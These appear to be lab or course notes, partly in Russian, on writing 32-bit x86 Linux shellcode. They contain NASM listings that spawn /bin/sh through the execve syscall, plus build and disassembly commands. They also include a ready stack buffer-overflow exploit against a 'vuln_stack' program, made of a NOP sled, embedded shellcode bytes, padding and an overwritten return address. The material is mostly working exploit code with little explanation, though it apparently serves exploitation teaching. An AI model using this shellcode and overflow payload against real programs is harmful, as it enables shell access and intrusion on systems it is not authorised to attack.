shelcode3.asm
section . text
global _start
_start :
xor eax , eax
push eax
push 0 x68732f6e
push 0 x69622f2f
mov ebx , esp
mov ecx , eax
mov edx , eax
mov al , 0xb
int 0x80
$ nasm -f elf shellcode3.asm
$ ld -m elf_i386 shellcode3.o -o shellcode3
./vuln_stack ∖
$(python -c 'print "∖x90"*40 + ∖
"∖x31∖xc0∖x50∖x68∖x6e∖x2f∖x73∖x68"∖
"∖x68∖x2f∖x2f∖x62∖x69∖x89∖xe3∖x89"∖
"∖xc1∖x89∖xc2∖xb0∖x0b∖xcd∖x80" + ∖
"A"*49 + "∖xf0∖xd5∖xff∖xff"')
objdump -M intel -d shellcode3
shellcode1.asm
section . text
global _start
_start :
push 0 x0068732f
push 0 x6e69622f
mov ebx , esp
mov ecx , 0
mov edx , 0
mov eax , 0xb
int 0x80
$ nasm -f elf shellcode1.asm
$ ld -m elf_i386 shellcode1.o -o shellcode1
python -c 'print(" ".join(["{:02x}".format(ord(c))
for c in "/bin/sh"]))'
objdump -M intel -d shellcode1
обертка на с
# include <unistd .h>
int main (int argc , char * argv []){
execve ("/bin/sh", 0, 0);
return 0;
}
gcc -m32 -g --static execve_sh.c -o execve_sh
gdb ./execve_sh
(gdb) set disassembly-flavor intel
(gdb) disassemble execve
Dump of assembler code for function execve:
0x0806bf70 <+0>: push ebx
0x0806bf71 <+1>: mov edx,DWORD PTR [esp+0x10]
0x0806bf75 <+5>: mov ecx,DWORD PTR [esp+0xc]
0x0806bf79 <+9>: mov ebx,DWORD PTR [esp+0x8]
0x0806bf7d <+13>: mov eax,0xb
0xb - код системной функции execve
